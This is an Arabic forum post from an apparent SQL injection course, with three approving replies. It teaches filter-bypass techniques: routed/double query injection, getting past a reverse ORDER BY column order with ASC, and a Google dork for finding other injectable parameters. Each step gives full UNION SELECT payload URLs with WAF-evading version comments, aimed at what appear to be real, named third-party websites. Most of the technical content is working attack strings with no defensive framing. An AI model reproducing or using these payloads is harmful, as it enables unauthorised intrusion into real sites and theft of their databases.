3- تقنيات التخطي الفائقة الجزء الثاني

الموضوع في 'دورة حقن قواعد البيانات 2018/2017' بواسطة Ahmed El Melegy, بتاريخ ‏22 أغسطس 2017.

كاتب الموضوع : Ahmed El Melegy المشاهدات : 443 الردود : 3 ‏22 أغسطس 2017
  1. غير متصل

    Ahmed El Melegy InjectorBoy
    طاقم الإدارة

    عضو منذ:
    ‏24 يوليو 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    200
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    [​IMG]


    السلام عليكم ورحمة الله

    الجزء الثالث من الدورة

    3- تقنيات التخطي الفائقة الجزء الثاني

    التقنيات المشروحة بهذا الفصل

    1- تقنية : routed query (double query injection)

    3- تقنية : Enumeration In SQL

    2- تقنية تخطي الترتيب المعاكس للأعمده عند إستخدام الـ order by 100



    الشرح




    1- تقنية : routed query (double query injection)


    لدي موقع مصاب وبعد إستخراج عدد الأعمده الصحيحه وإستغلالها كالتالي


    كود:
    www.onlinepost.in/show.php?page=39 DiV 0 /*!50000UnIoN*/ aLL SeLeCt 1,2,3,4,5,6,7,8,9,10,11-- -

    [​IMG]
    كما نشاهد ظهر الخطأ The used SELECT statements have a different number of columns وهذا
    معناه أن الحقن سوف يكون Error Based لكني طريقتي البريفت لتخطي هذه المشكله (ليس حل أكيد يفلح فقط مع 20% من المواقع التي تعطي هذا الخطأ) الحقن بالـ routed query


    أسلوب الحقن بالـ routed query


    أول شئ نذهب للإستغلال الكامل السابق بكافة الأعمدة الإحدى عشر


    كود:
    www.onlinepost.in/show.php?page=39 DiV 0 /*!50000UnIoN*/ aLL SeLeCt 1,2,3,4,5,6,7,8,9,10,11-- -

    ونٌضيف لهذا الإستغلال الإستعلام التالي بعد رقم المٌتغير


    كود:
    +DiV+0+/*!50000UnIoN*/ aLL SeLeCt+"1'

    كالتالي


    ?page=39+DiV+0+/*!50000UnIoN*/ aLL SeLeCt+"1' DiV 0 /*!50000UnIoN*/ aLL SeLeCt 1,2,3,4,5,6,7,8,9,10,11-- -


    كود:
    www.onlinepost.in/show.php?page=39+DiV+0+/*!50000UnIoN*/ aLL SeLeCt+"1' DiV 0 /*!50000UnIoN*/ aLL SeLeCt 1,2,3,4,5,6,7,8,9,10,11-- -

    ثٌمَّ نقوم بوضع علامة كومة مٌزدوجه " بعد الكوينت -- - كالتالي


    SeLeCt 1,2,3,4,5,6,7,8,9,10,11-- -"


    كود:
    www.onlinepost.in/show.php?page=39+DiV+0+/*!50000UnIoN*/ aLL SeLeCt+"1' DiV 0 /*!50000UnIoN*/ aLL SeLeCt 1,2,3,4,5,6,7,8,9,10,11-- -"


    ثٌمَّ نقوم بالحقن بعد الكومة المٌزدوجه " بالبدء بإضافة أعمدة بالبدء بـ ,2 وليس الواحد كما المٌعتاد بالحقن ونٌغلق بكومنت -- - كالتالي


    SeLeCt 1,2,3,4,5,6,7,8,9,10,11-- -",2 -- -


    كود:
    www.onlinepost.in/show.php?page=39+DiV+0+/*!50000UnIoN*/ aLL SeLeCt+"1' DiV 0 /*!50000UnIoN*/ aLL SeLeCt 1,2,3,4,5,6,7,8,9,10,11-- -",2 -- -


    [​IMG]

    ظهر خطأ نقوم بالزياده رقم رقم حتي تعمل الصفحه ويتم الحقن وذلك حتى الرقم إحدى عشر مجموع الأعمده الكٌلية للموقع كاحد نهائي


    SeLeCt 1,2,3,4,5,6,7,8,9,10,11-- -",2-- -

    SeLeCt 1,2,3,4,5,6,7,8,9,10,11-- -",2,3-- -

    SeLeCt 1,2,3,4,5,6,7,8,9,10,11-- -",2,3,4-- -


    الموقع يعمل جيداً عند الرقم أربعه


    كود:
    www.onlinepost.in/show.php?page=39+DiV+0+/*!50000UnIoN*/ aLL SeLeCt+"1' DiV 0 /*!50000UnIoN*/ aLL SeLeCt 1,2,3,4,5,6,7,8,9,10,11-- -",2,3,4-- -

    [​IMG]



    2- تقنية تخطي الترتيب المعاكس للأعمده عند إستخدام الـ order by 100

    عند إستخدام الـ order by 100 لمعرفة عدد الأعمدة للموقع وعندما تكون مٌرتبة ترتيب مٌعاكس سوف يحدٌث الخطأ فوربيدن Forbidden أٌو أي خطأ أخر مٌشابِه ولتخطي ذلك الإمر نقوم بإستعادة مسار الحقن بالصورة الطبيعية بإضافة القيم الإستعلامية تنازلي تصاعدى بعد العدد 100 بالإستعلام


    كود:
    http://www.bellajoias.com.br/categoria.php?id=3 order by 100 -- -

    [​IMG]

    حدث خطأ كما نرى لنقوم بتصحيح المسار الأن بإستخدام

    Desc

    ASC

    للمزيد من التفاصيل عنهٌما


    كود:
    https://stackoverflow.com/questions/5912770/select-last-20-order-by-ascending-php-mysql

    كود:
    http://www.bellajoias.com.br/categoria.php?id=3 order by 100 asc -- -

    [​IMG]

    الموقع يعمل جيداً الأن


    التقنية الإخيره لهذا الموضوع


    3- تقنية : Enumeration In SQL


    هي تقنية البحث إستبدال المٌتغير لنقوم بشرح عملي لتصل الفكرة

    لدي موقع وقٌمت بإستغلال عدد الأعمدة الصحيحه الخمس ولم يعمل نهائي مع أي أٌسلوب تخطي كالتالي


    كود:
    www.innofader.com/products.php?id=.1' union select 1,2,3,4,5 -- -

    [​IMG]


    ولتخطي هذا الأمر سوف نقوم بإستخدام تقنية الـ Enumeration In SQL كالتالي

    نذهب لمٌحرك البحث جوجال ونضع به هذا الكود

    inurl:php?id= site:your site

    لكن أولا نقوم بتغير your site برابط الموقع الصعب حقنه كالتالي


    inurl:php?id= site:www.innofader.com


    [​IMG]

    كما نرى مٌحرك البحث أظهر لنا مٌتغيرات كثرة لنفس الموقع لذا لنقوم بتجروبة حقنها
    مٌتغير موقعنا صعب الحقن هو

    products.php?id=1

    وبالبحث وجدت المٌتغير ومٌصاب

    mixers.php?id=137


    وكان الإستغلال ناجح جداُ


    كود:
    http://www.innofader.com/mixers.php?id=.137 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 -- -

    [​IMG]


    إنتهى الجٌزء الثاني إلى اللقاء القريب
     


    جاري تحميل الصفحة...
  2. غير متصل

    Da silva
    rank
    New Developer

    عضو منذ:
    ‏9 يوليو 2016
    عدد المشاركات:
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    استمر
     


    أعجب بهذه المشاركة Ahmed El Melegy
  3. غير متصل

    Matrix0
    rank
    New Developer

    عضو منذ:
    ‏22 أغسطس 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    جميل متابع شروحات ونعيد عليها مرة لعدم النسيان ^__^
     


  4. غير متصل

    Never Surrender
    rank
    New Developer

    عضو منذ:
    ‏30 يناير 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    بارك الله فيك شرح ولا اروع
    بنتظار الجزاء الرابع ...
     


مشاركة هذه الصفحة

جاري تحميل الصفحة...